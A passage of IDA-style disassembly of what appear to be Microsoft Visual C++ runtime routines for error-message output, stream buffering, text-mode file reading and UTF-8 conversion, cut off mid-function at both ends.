		add	esp, 14h

loc_40A13D:				; CODE XREF: sub_40A074+A1j
					; sub_40A074+B8j
		push	esi
		call	sub_4046F0
		inc	eax
		cmp	eax, 3Ch
		pop	ecx
		jbe	short loc_40A182
		push	esi
		call	sub_4046F0
		sub	esi, 3Bh
		add	eax, esi
		push	3
		mov	ecx, offset dword_42864C
		push	offset a___	; "..."
		sub	ecx, eax
		push	ecx
		push	eax
		call	sub_40CE06
		add	esp, 14h
		test	eax, eax
		jz	short loc_40A182
		xor	esi, esi
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h
		jmp	short loc_40A184
; ---------------------------------------------------------------------------

loc_40A182:				; CODE XREF: sub_40A074+D4j
					; sub_40A074+FBj
		xor	esi, esi

loc_40A184:				; CODE XREF: sub_40A074+10Cj
		push	offset asc_41EB30 ; "\n\n"
		push	ebx
		push	ebp
		call	sub_40CD4D
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_40A1A4
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_40A1A4:				; CODE XREF: sub_40A074+121j
		push	off_424C04[edi*8]
		push	ebx
		push	ebp
		call	sub_40CD4D
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_40A1C6
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_40A1C6:				; CODE XREF: sub_40A074+143j
		push	12010h
		push	offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
		push	ebp
		call	sub_40FAE4
		add	esp, 0Ch
		jmp	short loc_40A20E
; ---------------------------------------------------------------------------

loc_40A1DB:				; CODE XREF: sub_40A074+30j
					; sub_40A074+49j
		push	0FFFFFFF4h
		call	ds:dword_41E148	; GetStdHandle
		mov	ebp, eax
		cmp	ebp, esi
		jz	short loc_40A20E
		cmp	ebp, 0FFFFFFFFh
		jz	short loc_40A20E
		push	0
		lea	eax, [esp+18h+var_4]
		push	eax
		lea	esi, ds:424C04h[edi*8]
		push	dword ptr [esi]
		call	sub_4046F0
		pop	ecx
		push	eax
		push	dword ptr [esi]
		push	ebp
		call	ds:off_41E088

loc_40A20E:				; CODE XREF: sub_40A074+55j
					; sub_40A074+165j ...
		pop	ebp

loc_40A20F:				; CODE XREF: sub_40A074+1Ej
		pop	edi
		pop	esi
		pop	ebx
		pop	ecx
		retn
sub_40A074	endp


; =============== S U B	R O U T	I N E =======================================



sub_40A214	proc near		; CODE XREF: sub_403C6E+23p
					; sub_40449D+9p ...
		push	3
		call	sub_40FC82
		cmp	eax, 1
		pop	ecx
		jz	short loc_40A236
		push	3
		call	sub_40FC82
		test	eax, eax
		pop	ecx
		jnz	short locret_40A24C
		cmp	dword_424050, 1
		jnz	short locret_40A24C

loc_40A236:				; CODE XREF: sub_40A214+Bj
		push	0FCh
		call	sub_40A074
		push	0FFh
		call	sub_40A074
		pop	ecx
		pop	ecx

locret_40A24C:				; CODE XREF: sub_40A214+17j
					; sub_40A214+20j
		retn
sub_40A214	endp


; =============== S U B	R O U T	I N E =======================================



sub_40A24D	proc near		; CODE XREF: sub_4040B2+EDp
					; sub_4093EC+Fp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	edi
		xor	edi, edi
		cmp	esi, edi
		jnz	short loc_40A276
		call	sub_405D93
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		jmp	loc_40A367
; ---------------------------------------------------------------------------

loc_40A276:				; CODE XREF: sub_40A24D+Aj
		mov	eax, [esi+0Ch]
		test	al, 83h
		jz	loc_40A367
		test	al, 40h
		jnz	loc_40A367
		test	al, 2
		jz	short loc_40A298
		or	eax, 20h
		mov	[esi+0Ch], eax
		jmp	loc_40A367
; ---------------------------------------------------------------------------

loc_40A298:				; CODE XREF: sub_40A24D+3Ej
		or	eax, 1
		test	ax, 10Ch
		mov	[esi+0Ch], eax
		jnz	short loc_40A2AD
		push	esi
		call	sub_40DABC
		pop	ecx
		jmp	short loc_40A2B2
; ---------------------------------------------------------------------------

loc_40A2AD:				; CODE XREF: sub_40A24D+55j
		mov	eax, [esi+8]
		mov	[esi], eax

loc_40A2B2:				; CODE XREF: sub_40A24D+5Ej
		push	dword ptr [esi+18h]
		push	dword ptr [esi+8]
		push	esi
		call	sub_408FE0
		pop	ecx
		push	eax
		call	sub_40A90F
		add	esp, 0Ch
		cmp	eax, edi
		mov	[esi+4], eax
		jz	loc_40A357
		cmp	eax, 0FFFFFFFFh
		jz	short loc_40A357
		test	byte ptr [esi+0Ch], 82h
		jnz	short loc_40A32D
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_40A318
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_40A318
		push	esi
		call	sub_408FE0
		sar	eax, 5
		push	esi
		lea	edi, ds:437700h[eax*4]
		call	sub_408FE0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_40A31D
; ---------------------------------------------------------------------------

loc_40A318:				; CODE XREF: sub_40A24D+9Bj
					; sub_40A24D+A7j
		mov	eax, offset dword_424BD0

loc_40A31D:				; CODE XREF: sub_40A24D+C9j
		mov	al, [eax+4]
		and	al, 82h
		cmp	al, 82h
		jnz	short loc_40A32D
		or	dword ptr [esi+0Ch], 2000h

loc_40A32D:				; CODE XREF: sub_40A24D+8Fj
					; sub_40A24D+D7j
		cmp	dword ptr [esi+18h], 200h
		jnz	short loc_40A34A
		mov	eax, [esi+0Ch]
		test	al, 8
		jz	short loc_40A34A
		test	ax, 400h
		jnz	short loc_40A34A
		mov	dword ptr [esi+18h], 1000h

loc_40A34A:				; CODE XREF: sub_40A24D+E7j
					; sub_40A24D+EEj ...
		mov	ecx, [esi]
		dec	dword ptr [esi+4]
		movzx	eax, byte ptr [ecx]
		inc	ecx
		mov	[esi], ecx
		jmp	short loc_40A36A
; ---------------------------------------------------------------------------

loc_40A357:				; CODE XREF: sub_40A24D+80j
					; sub_40A24D+89j
		neg	eax
		sbb	eax, eax
		and	eax, 10h
		add	eax, 10h
		or	[esi+0Ch], eax
		mov	[esi+4], edi

loc_40A367:				; CODE XREF: sub_40A24D+24j
					; sub_40A24D+2Ej ...
		or	eax, 0FFFFFFFFh

loc_40A36A:				; CODE XREF: sub_40A24D+108j
		pop	edi
		pop	esi
		retn
sub_40A24D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40A36D	proc near		; CODE XREF: sub_40A90F+9Ap
					; sub_40E632+355p ...

var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= word ptr -8
var_2		= byte ptr -2
var_1		= byte ptr -1
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 1Ch
		mov	edx, [ebp+arg_8]
		push	esi
		mov	esi, [ebp+arg_0]
		push	0FFFFFFFEh
		pop	eax
		cmp	esi, eax
		mov	[ebp+var_14], eax
		mov	[ebp+var_1C], edx
		jnz	short loc_40A3A2
		call	sub_405DA6
		and	dword ptr [eax], 0
		call	sub_405D93
		mov	dword ptr [eax], 9
		or	eax, 0FFFFFFFFh
		jmp	loc_40A90C
; ---------------------------------------------------------------------------

loc_40A3A2:				; CODE XREF: sub_40A36D+18j
		push	edi
		xor	edi, edi
		cmp	esi, edi
		jl	short loc_40A3B1
		cmp	esi, dword_4376E4
		jb	short loc_40A3D8

loc_40A3B1:				; CODE XREF: sub_40A36D+3Aj
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 9
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_40A90B
; ---------------------------------------------------------------------------

loc_40A3D8:				; CODE XREF: sub_40A36D+42j
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		push	ebx
		lea	ebx, ds:437700h[eax*4]
		mov	eax, [ebx]
		add	eax, esi
		mov	cl, [eax+4]
		test	cl, 1
		jnz	short loc_40A40E
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		mov	dword ptr [eax], 9
		jmp	loc_40A555
; ---------------------------------------------------------------------------

loc_40A40E:				; CODE XREF: sub_40A36D+88j
		cmp	edx, edi
		mov	[ebp+var_10], edi
		jz	loc_40A908
		test	cl, 2
		jnz	loc_40A908
		mov	ecx, [ebp+arg_4]
		cmp	ecx, edi
		jz	loc_40A543
		mov	al, [eax+24h]
		add	al, al
		sar	al, 1
		mov	[ebp+var_2], al
		movsx	eax, al
		dec	eax
		jz	loc_40A53B
		dec	eax
		jnz	short loc_40A456
		mov	eax, edx
		not	eax
		test	al, 1
		jz	loc_40A543
		and	edx, 0FFFFFFFEh
		mov	[ebp+arg_8], edx

loc_40A456:				; CODE XREF: sub_40A36D+D5j
		mov	[ebp+var_C], ecx

loc_40A459:				; CODE XREF: sub_40A36D+216j
		mov	ecx, [ebx]
		mov	eax, [ebp+var_C]
		lea	edi, [esi+ecx]
		test	byte ptr [edi+4], 48h
		jz	short loc_40A4DD
		mov	cl, [edi+5]
		cmp	cl, 0Ah
		jz	short loc_40A4DD
		xor	edx, edx
		cmp	[ebp+arg_8], edx
		jz	short loc_40A4DD
		mov	[eax], cl
		mov	ecx, [ebx]
		inc	eax
		dec	[ebp+arg_8]
		cmp	[ebp+var_2], dl
		mov	[ebp+var_10], 1
		mov	byte ptr [esi+ecx+5], 0Ah
		jz	short loc_40A4DD
		mov	ecx, [ebx]
		mov	cl, [esi+ecx+25h]
		cmp	cl, 0Ah
		jz	short loc_40A4DD
		cmp	[ebp+arg_8], edx
		jz	short loc_40A4DD
		mov	[eax], cl
		mov	ecx, [ebx]
		inc	eax
		dec	[ebp+arg_8]
		cmp	[ebp+var_2], 1
		mov	[ebp+var_10], 2
		mov	byte ptr [esi+ecx+25h],	0Ah
		jnz	short loc_40A4DD
		mov	ecx, [ebx]
		mov	cl, [esi+ecx+26h]
		cmp	cl, 0Ah
		jz	short loc_40A4DD
		cmp	[ebp+arg_8], edx
		jz	short loc_40A4DD
		mov	[eax], cl
		mov	ecx, [ebx]
		inc	eax
		dec	[ebp+arg_8]
		mov	[ebp+var_10], 3
		mov	byte ptr [esi+ecx+26h],	0Ah

loc_40A4DD:				; CODE XREF: sub_40A36D+F8j
					; sub_40A36D+100j ...
		push	0
		lea	ecx, [ebp+var_18]
		push	ecx
		push	[ebp+arg_8]
		push	eax
		mov	eax, [ebx]
		push	dword ptr [esi+eax]
		call	ds:off_41E078
		test	eax, eax
		jz	loc_40A8D2
		mov	edi, [ebp+var_18]
		test	edi, edi
		jl	loc_40A8D2
		cmp	edi, [ebp+arg_8]
		ja	loc_40A8D2
		mov	eax, [ebx]
		add	[ebp+var_10], edi
		lea	eax, [esi+eax+4]
		test	byte ptr [eax],	80h
		jz	loc_40A772
		cmp	[ebp+var_2], 2
		jz	loc_40A79C
		test	edi, edi
		jz	short loc_40A5A7
		mov	ecx, [ebp+var_C]
		cmp	byte ptr [ecx],	0Ah
		jnz	short loc_40A5A7
		or	byte ptr [eax],	4
		jmp	short loc_40A5AA
; ---------------------------------------------------------------------------

loc_40A53B:				; CODE XREF: sub_40A36D+CEj
		mov	eax, edx
		not	eax
		test	al, 1
		jnz	short loc_40A564

loc_40A543:				; CODE XREF: sub_40A36D+BAj
					; sub_40A36D+DDj
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		mov	dword ptr [eax], 16h

loc_40A555:				; CODE XREF: sub_40A36D+9Cj
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_40A59F
; ---------------------------------------------------------------------------

loc_40A564:				; CODE XREF: sub_40A36D+1D4j
		mov	eax, edx
		push	4
		pop	ecx
		shr	eax, 1
		cmp	eax, ecx
		mov	[ebp+arg_8], ecx
		jb	short loc_40A575
		mov	[ebp+arg_8], eax

loc_40A575:				; CODE XREF: sub_40A36D+203j
		push	[ebp+arg_8]
		call	sub_407CFA
		cmp	eax, edi
		pop	ecx
		mov	[ebp+var_C], eax
		jnz	loc_40A459
		call	sub_405D93
		mov	dword ptr [eax], 0Ch
		call	sub_405DA6
		mov	dword ptr [eax], 8

loc_40A59F:				; CODE XREF: sub_40A36D+1F5j
		or	eax, 0FFFFFFFFh
		jmp	loc_40A90A
; ---------------------------------------------------------------------------

loc_40A5A7:				; CODE XREF: sub_40A36D+1BFj
					; sub_40A36D+1C7j
		and	byte ptr [eax],	0FBh

loc_40A5AA:				; CODE XREF: sub_40A36D+1CCj
		mov	edi, [ebp+var_C]
		mov	eax, [ebp+var_10]
		add	eax, edi
		cmp	edi, eax
		mov	[ebp+arg_8], edi
		mov	[ebp+var_10], eax
		jnb	loc_40A690

loc_40A5C0:				; CODE XREF: sub_40A36D+306j
		mov	ecx, [ebp+arg_8]
		mov	al, [ecx]
		cmp	al, 1Ah
		jz	loc_40A67B
		cmp	al, 0Dh
		jz	short loc_40A5DD
		mov	[edi], al
		inc	edi
		inc	ecx
		mov	[ebp+arg_8], ecx
		jmp	loc_40A66D
; ---------------------------------------------------------------------------

loc_40A5DD:				; CODE XREF: sub_40A36D+262j
		mov	eax, [ebp+var_10]
		dec	eax
		cmp	ecx, eax
		jnb	short loc_40A5FC
		lea	eax, [ecx+1]
		cmp	byte ptr [eax],	0Ah
		jnz	short loc_40A5F7
		inc	ecx
		inc	ecx
		mov	[ebp+arg_8], ecx

loc_40A5F2:				; CODE XREF: sub_40A36D+2CAj
					; sub_40A36D+2E3j
		mov	byte ptr [edi],	0Ah
		jmp	short loc_40A66C
; ---------------------------------------------------------------------------

loc_40A5F7:				; CODE XREF: sub_40A36D+27Ej
		mov	[ebp+arg_8], eax
		jmp	short loc_40A669
; ---------------------------------------------------------------------------

loc_40A5FC:				; CODE XREF: sub_40A36D+276j
		inc	[ebp+arg_8]
		push	0
		lea	eax, [ebp+var_18]
		push	eax
		push	1
		lea	eax, [ebp+var_1]
		push	eax
		mov	eax, [ebx]
		push	dword ptr [esi+eax]
		call	ds:off_41E078
		test	eax, eax
		jnz	short loc_40A624
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		test	eax, eax
		jnz	short loc_40A669

loc_40A624:				; CODE XREF: sub_40A36D+2ABj
		cmp	[ebp+var_18], 0
		jz	short loc_40A669
		mov	eax, [ebx]
		test	byte ptr [esi+eax+4], 48h
		jz	short loc_40A647
		cmp	[ebp+var_1], 0Ah
		jz	short loc_40A5F2
		mov	byte ptr [edi],	0Dh
		mov	eax, [ebx]
		mov	cl, [ebp+var_1]
		mov	[esi+eax+5], cl
		jmp	short loc_40A66C
; ---------------------------------------------------------------------------

loc_40A647:				; CODE XREF: sub_40A36D+2C4j
		cmp	edi, [ebp+var_C]
		jnz	short loc_40A652
		cmp	[ebp+var_1], 0Ah
		jz	short loc_40A5F2

loc_40A652:				; CODE XREF: sub_40A36D+2DDj
		push	1
		push	0FFFFFFFFh
		push	0FFFFFFFFh
		push	[ebp+arg_0]
		call	sub_40D27E
		add	esp, 10h
		cmp	[ebp+var_1], 0Ah
		jz	short loc_40A66D

loc_40A669:				; CODE XREF: sub_40A36D+28Dj
					; sub_40A36D+2B5j ...
		mov	byte ptr [edi],	0Dh

loc_40A66C:				; CODE XREF: sub_40A36D+288j
					; sub_40A36D+2D8j
		inc	edi

loc_40A66D:				; CODE XREF: sub_40A36D+26Bj
					; sub_40A36D+2FAj
		mov	eax, [ebp+var_10]
		cmp	[ebp+arg_8], eax
		jb	loc_40A5C0
		jmp	short loc_40A690
; ---------------------------------------------------------------------------

loc_40A67B:				; CODE XREF: sub_40A36D+25Aj
		mov	eax, [ebx]
		lea	eax, [esi+eax+4]
		test	byte ptr [eax],	40h
		jnz	short loc_40A68B
		or	byte ptr [eax],	2
		jmp	short loc_40A690
; ---------------------------------------------------------------------------

loc_40A68B:				; CODE XREF: sub_40A36D+317j
		mov	al, [ecx]
		mov	[edi], al
		inc	edi

loc_40A690:				; CODE XREF: sub_40A36D+24Dj
					; sub_40A36D+30Cj ...
		mov	eax, edi
		sub	eax, [ebp+var_C]
		cmp	[ebp+var_2], 1
		mov	[ebp+var_10], eax
		jnz	loc_40A772
		test	eax, eax
		jz	loc_40A772
		dec	edi
		mov	cl, [edi]
		test	cl, cl
		js	short loc_40A6B7
		inc	edi
		jmp	loc_40A73D
; ---------------------------------------------------------------------------

loc_40A6B7:				; CODE XREF: sub_40A36D+342j
		xor	eax, eax
		inc	eax
		movzx	ecx, cl
		jmp	short loc_40A6CE
; ---------------------------------------------------------------------------

loc_40A6BF:				; CODE XREF: sub_40A36D+368j
		cmp	eax, 4
		jg	short loc_40A6D7
		cmp	edi, [ebp+var_C]
		jb	short loc_40A6D7
		dec	edi
		movzx	ecx, byte ptr [edi]
		inc	eax

loc_40A6CE:				; CODE XREF: sub_40A36D+350j
		cmp	byte_424CB8[ecx], 0
		jz	short loc_40A6BF

loc_40A6D7:				; CODE XREF: sub_40A36D+355j
					; sub_40A36D+35Aj
		mov	dl, [edi]
		movzx	ecx, dl
		movsx	ecx, byte_424CB8[ecx]
		test	ecx, ecx
		jnz	short loc_40A6F4
		call	sub_405D93
		mov	dword ptr [eax], 2Ah
		jmp	short loc_40A76E
; ---------------------------------------------------------------------------

loc_40A6F4:				; CODE XREF: sub_40A36D+378j
		inc	ecx
		cmp	ecx, eax
		jnz	short loc_40A6FD
		add	edi, eax
		jmp	short loc_40A73D
; ---------------------------------------------------------------------------

loc_40A6FD:				; CODE XREF: sub_40A36D+38Aj
		mov	ecx, [ebx]
		add	ecx, esi
		test	byte ptr [ecx+4], 48h
		jz	short loc_40A72B
		inc	edi
		cmp	eax, 2
		mov	[ecx+5], dl
		jl	short loc_40A719
		mov	dl, [edi]
		mov	ecx, [ebx]
		mov	[esi+ecx+25h], dl
		inc	edi

loc_40A719:				; CODE XREF: sub_40A36D+3A1j
		cmp	eax, 3
		jnz	short loc_40A727
		mov	dl, [edi]
		mov	ecx, [ebx]
		mov	[esi+ecx+26h], dl
		inc	edi

loc_40A727:				; CODE XREF: sub_40A36D+3AFj
		sub	edi, eax
		jmp	short loc_40A73D
; ---------------------------------------------------------------------------

loc_40A72B:				; CODE XREF: sub_40A36D+398j
		neg	eax
		cdq
		push	1
		push	edx
		push	eax
		push	[ebp+arg_0]
		call	sub_40D27E
		add	esp, 10h

loc_40A73D:				; CODE XREF: sub_40A36D+345j
					; sub_40A36D+38Ej ...
		mov	eax, [ebp+var_1C]
		sub	edi, [ebp+var_C]
		shr	eax, 1
		push	eax
		push	[ebp+arg_4]
		push	edi
		push	[ebp+var_C]
		push	0
		push	0FDE9h
		call	ds:dword_41E0A0	; MultiByteToWideChar
		test	eax, eax
		mov	[ebp+var_10], eax
		jnz	short loc_40A795
		call	ds:dword_41E0EC	; RtlGetLastWin32Error

loc_40A767:				; CODE XREF: sub_40A36D+58Cj
		push	eax
		call	sub_405DB9
		pop	ecx

loc_40A76E:				; CODE XREF: sub_40A36D+385j
					; sub_40A36D+584j
		or	[ebp+var_14], 0FFFFFFFFh

loc_40A772:				; CODE XREF: sub_40A36D+1ADj
					; sub_40A36D+32Fj ...
		mov	eax, [ebp+var_C]
		cmp	eax, [ebp+arg_4]
		jz	short loc_40A781
		push	eax
		call	sub_403B91
		pop	ecx

loc_40A781:				; CODE XREF: sub_40A36D+40Bj
		mov	eax, [ebp+var_14]
		cmp	eax, 0FFFFFFFEh
		jnz	loc_40A90A
		mov	eax, [ebp+var_10]
		jmp	loc_40A90A
; ---------------------------------------------------------------------------

loc_40A795:				; CODE XREF: sub_40A36D+3F2j
		add	eax, eax
		mov	[ebp+var_10], eax
		jmp	short loc_40A772
; ---------------------------------------------------------------------------

loc_40A79C:				; CODE XREF: sub_40A36D+1B7j
		test	edi, edi
		jz	short loc_40A7AE
		mov	ecx, [ebp+var_C]
		cmp	word ptr [ecx],	0Ah
		jnz	short loc_40A7AE
		or	byte ptr [eax],	4
		jmp	short loc_40A7B1
; ---------------------------------------------------------------------------

loc_40A7AE:				; CODE XREF: sub_40A36D+431j
					; sub_40A36D+43Aj
		and	byte ptr [eax],	0FBh

loc_40A7B1:				; CODE XREF: sub_40A36D+43Fj
		mov	edi, [ebp+var_C]
		mov	eax, [ebp+var_10]
		add	eax, edi
		cmp	edi, eax
		mov	[ebp+arg_8], edi
		mov	[ebp+var_10], eax
		jnb	loc_40A8C7

loc_40A7C7:				; CODE XREF: sub_40A36D+53Aj
		mov	eax, [ebp+arg_8]
		movzx	ecx, word ptr [eax]
		cmp	cx, 1Ah
		jz	loc_40A8AF
		cmp	cx, 0Dh
		jz	short loc_40A7EC
		mov	[edi], cx
		inc	edi
		inc	edi
		inc	eax
		inc	eax
		mov	[ebp+arg_8], eax
		jmp	loc_40A8A1
; ---------------------------------------------------------------------------

loc_40A7EC:				; CODE XREF: sub_40A36D+46Ej
		mov	ecx, [ebp+var_10]
		add	ecx, 0FFFFFFFEh
		cmp	eax, ecx
		jnb	short loc_40A817
		lea	ecx, [eax+2]
		cmp	word ptr [ecx],	0Ah
		jnz	short loc_40A80F
		add	eax, 4
		mov	[ebp+arg_8], eax

loc_40A805:				; CODE XREF: sub_40A36D+4E7j
					; sub_40A36D+513j
		mov	word ptr [edi],	0Ah
		jmp	loc_40A89F
; ---------------------------------------------------------------------------

loc_40A80F:				; CODE XREF: sub_40A36D+490j
		mov	[ebp+arg_8], ecx
		jmp	loc_40A89A
; ---------------------------------------------------------------------------

loc_40A817:				; CODE XREF: sub_40A36D+487j
		add	[ebp+arg_8], 2
		push	0
		lea	eax, [ebp+var_18]
		push	eax
		push	2
		lea	eax, [ebp+var_8]
		push	eax
		mov	eax, [ebx]
		push	dword ptr [esi+eax]
		call	ds:off_41E078
		test	eax, eax
		jnz	short loc_40A840
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		test	eax, eax
		jnz	short loc_40A89A

loc_40A840:				; CODE XREF: sub_40A36D+4C7j
		cmp	[ebp+var_18], 0
		jz	short loc_40A89A
		mov	eax, [ebx]
		test	byte ptr [esi+eax+4], 48h
		jz	short loc_40A876
		cmp	[ebp+var_8], 0Ah
		jz	short loc_40A805
		mov	word ptr [edi],	0Dh
		mov	eax, [ebx]
		mov	cl, byte ptr [ebp+var_8]
		mov	[esi+eax+5], cl
		mov	eax, [ebx]
		mov	cl, byte ptr [ebp+var_8+1]
		mov	[esi+eax+25h], cl
		mov	eax, [ebx]
		mov	byte ptr [esi+eax+26h],	0Ah
		jmp	short loc_40A89F
; ---------------------------------------------------------------------------

loc_40A876:				; CODE XREF: sub_40A36D+4E0j
		cmp	edi, [ebp+var_C]
		jnz	short loc_40A882
		cmp	[ebp+var_8], 0Ah
		jz	short loc_40A805

loc_40A882:				; CODE XREF: sub_40A36D+50Cj
		push	1
		push	0FFFFFFFFh
		push	0FFFFFFFEh
		push	[ebp+arg_0]
		call	sub_40D27E
		add	esp, 10h
		cmp	[ebp+var_8], 0Ah
		jz	short loc_40A8A1

loc_40A89A:				; CODE XREF: sub_40A36D+4A5j
					; sub_40A36D+4D1j ...
		mov	word ptr [edi],	0Dh

loc_40A89F:				; CODE XREF: sub_40A36D+49Dj
					; sub_40A36D+507j
		inc	edi
		inc	edi

loc_40A8A1:				; CODE XREF: sub_40A36D+47Aj
					; sub_40A36D+52Bj
		mov	eax, [ebp+var_10]
		cmp	[ebp+arg_8], eax
		jb	loc_40A7C7
		jmp	short loc_40A8C7
; ---------------------------------------------------------------------------

loc_40A8AF:				; CODE XREF: sub_40A36D+464j
		mov	ecx, [ebx]
		lea	esi, [esi+ecx+4]
		test	byte ptr [esi],	40h
		jnz	short loc_40A8BF
		or	byte ptr [esi],	2
		jmp	short loc_40A8C7
; ---------------------------------------------------------------------------

loc_40A8BF:				; CODE XREF: sub_40A36D+54Bj
		mov	ax, [eax]
		mov	[edi], ax
		inc	edi
		inc	edi

loc_40A8C7:				; CODE XREF: sub_40A36D+454j
					; sub_40A36D+540j ...
		sub	edi, [ebp+var_C]
		mov	[ebp+var_10], edi
		jmp	loc_40A772
; ---------------------------------------------------------------------------

loc_40A8D2:				; CODE XREF: sub_40A36D+187j
					; sub_40A36D+192j ...
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		push	5
		pop	esi
		cmp	eax, esi
		jnz	short loc_40A8F6
		call	sub_405D93
		mov	dword ptr [eax], 9
		call	sub_405DA6
		mov	[eax], esi
		jmp	loc_40A76E
; ---------------------------------------------------------------------------

loc_40A8F6:				; CODE XREF: sub_40A36D+570j
		cmp	eax, 6Dh
		jnz	loc_40A767
		and	[ebp+var_14], 0
		jmp	loc_40A772
; ---------------------------------------------------------------------------

loc_40A908:				; CODE XREF: sub_40A36D+A6j
					; sub_40A36D+AFj
		xor	eax, eax

loc_40A90A:				; CODE XREF: sub_40A36D+235j
					; sub_40A36D+41Aj ...
		pop	ebx

loc_40A90B:				; CODE XREF: sub_40A36D+66j
		pop	edi

loc_40A90C:				; CODE XREF: sub_40A36D+30j
		pop	esi
		leave
		retn
sub_40A36D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40A90F	proc near		; CODE XREF: sub_4040B2+C9p
					; sub_40A24D+73p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	10h
		push	offset dword_422B30
		call	__SEH_prolog4
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40A93E
		call	sub_405DA6
		and	dword ptr [eax], 0
		call	sub_405D93
		mov	dword ptr [eax], 9

loc_40A936:				; CODE XREF: sub_40A90F+5Cj
		or	eax, 0FFFFFFFFh
		jmp	loc_40A9DB
; ---------------------------------------------------------------------------

loc_40A93E:				; CODE XREF: sub_40A90F+12j
		xor	edi, edi
		cmp	eax, edi
		jl	short loc_40A94C
		cmp	eax, dword_4376E4
		jb	short loc_40A96D

loc_40A94C:				; CODE XREF: sub_40A90F+33j
					; sub_40A90F+7Cj
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_40A936
; ---------------------------------------------------------------------------

loc_40A96D:				; CODE XREF: sub_40A90F+3Bj
		mov	ecx, eax
		sar	ecx, 5
		lea	ebx, ds:437700h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, [ebx]
		movzx	ecx, byte ptr [ecx+esi+4]
		and	ecx, 1
		jz	short loc_40A94C
		push	eax
		call	sub_40F3AE
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		mov	eax, [ebx]
		test	byte ptr [eax+esi+4], 1
		jz	short loc_40A9B6
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40A36D
		add	esp, 0Ch
		mov	[ebp+var_1C], eax
		jmp	short loc_40A9CC
; ---------------------------------------------------------------------------

loc_40A9B6:				; CODE XREF: sub_40A90F+8Fj
		call	sub_405D93
		mov	dword ptr [eax], 9
		call	sub_405DA6
		mov	[eax], edi
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40A9CC:				; CODE XREF: sub_40A90F+A5j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40A9E1
		mov	eax, [ebp+var_1C]

loc_40A9DB:				; CODE XREF: sub_40A90F+2Aj
		call	__SEH_epilog4
		retn
sub_40A90F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40A9E1	proc near		; CODE XREF: sub_40A90F+C4p
					; DATA XREF: jlrllt49:00422B48o
		push	dword ptr [ebp+8]
		call	sub_40F44E
		pop	ecx
		retn
sub_40A9E1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40A9EB	proc near		; CODE XREF: sub_40AC16:loc_40AC35p

var_14		= dword	ptr -14h
var_C		= dword	ptr -0Ch
var_8		= byte ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		push	esi
		push	edi
		push	[ebp+arg_0]
		lea	ecx, [ebp+var_14]
		call	sub_402CAD
		mov	eax, [ebp+arg_8]
		mov	esi, [ebp+arg_4]
		xor	edi, edi
		cmp	eax, edi
		jz	short loc_40AA0C
		mov	[eax], esi

loc_40AA0C:				; CODE XREF: sub_40A9EB+1Dj
		cmp	esi, edi
		jnz	short loc_40AA3C

loc_40AA10:				; CODE XREF: sub_40A9EB+5Aj
					; sub_40A9EB+60j
		call	sub_405D93
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_8], 0
		jz	short loc_40AA35
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40AA35:				; CODE XREF: sub_40A9EB+41j
		xor	eax, eax
		jmp	loc_40AC12
; ---------------------------------------------------------------------------

loc_40AA3C:				; CODE XREF: sub_40A9EB+23j
		cmp	[ebp+arg_C], edi
